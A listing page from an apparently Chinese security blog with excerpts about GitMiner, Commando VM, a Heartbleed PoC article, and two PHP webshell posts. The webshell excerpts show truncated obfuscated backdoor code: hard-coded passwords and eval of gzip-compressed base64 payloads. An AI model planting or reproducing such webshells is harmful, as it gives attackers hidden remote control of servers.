搜索 “hxd”

不再关注网络安全

hxd

  • 2022-03-20
  • tools
  • 959 阅读

GitMiner:Github敏感信息泄露高级挖掘工具

GitMiner:Github敏感信息泄露高级挖掘工具

GitMiner介绍 Github 中的自动化高级搜索工具。 这个工具的目的是通过搜索 github 上的代码或代码片段发现敏感信息泄露。证明公共存储库存储敏感信息代码的脆弱性。 GitMiner github信息泄露扫描工具 要求 lxmlrequestsargparsejsonre GitMiner安装 $ git clone http://github.com/UnkL4b/...

Commando VM v2.0  – 基于Windows的渗透测试工具包

Commando VM v2.0 – 基于Windows的渗透测试工具包

Commando VM CommandoVM 是一个完全可定制的,基于Windows的安全发行版,用于渗透测试和红队测试。在2019年3月28日发布了首个版本《火眼Windows渗透工具包 – CommandoVM》,现在,2.0版本来了。 Windows渗透工具包 Commando VM安装与使用 项目地址:https://github.com/fireeye/commando-vm 与1.0版本安装方法相同不赘述,请...

火眼Windows渗透工具包 – CommandoVM

火眼Windows渗透工具包 – CommandoVM

在Linux下有我们熟知的Kali Linux,但Windows下是空白的,现在,有安全公司(美国网络安全服务商火眼公司FireEye)站出来填补了这一市场,希望能一直维护下去。 顺便一提,体验盒子最近上线了Hacking Tools:渗透测试工具、网络安全工具、用于渗透测试和安全审计的工具仓库。含各类型,各平台安全工具集。后期我们也会将火眼Windows的渗...

Crack8_PHP webshell

Crack8_PHP webshell

PHP <?php /** * Created by uedbox.com. * User: hackgyj * Date: 15/10/28 * Time: 下午8:59 */ $admin['pass'] = "lqx"; //设置密码 $notice = "<FONT color=#ff3300>Crack8_PHP木马</font>"; //设置版权 eval(gzuncompress(base64_decode("eJzsffl3G8eR8M/0e/4fRhOuAJog...

BNKQbAKQ webshell

PHP <?php /** * Created by uedbox.com. * User: hackgyj * Date: 15/10/27 * Time: 上午9:30 */ $user = "Anarchy"; $pass = "Chaos"; function zWM( $NXlKO ) { $NXlKO = gzuncompress( base64_decode( $NXlK...

OpenSSL严重安全漏洞专文<附POC等等>

OpenSSL严重安全漏洞专文<附POC等等>

  • 2014-04-09
  • 周边
  • 2383 阅读

CVE-2014-0160漏洞背景 2014年4月7日OpenSSL发布了安全公告,在OpenSSL1.0.1版本中存在严重漏洞(CVE-2014-0160),此次漏洞问题存在于ssl/dl_both.c文件中。OpenSSL Heartbleed模块存在一个BUG,当攻击者构造一个特殊的数据包,满足用户心跳包中无法提供足够多的数据会导致memcpy把SSLv3记录之后的数据直接输出,该漏洞导致攻击者可以远程...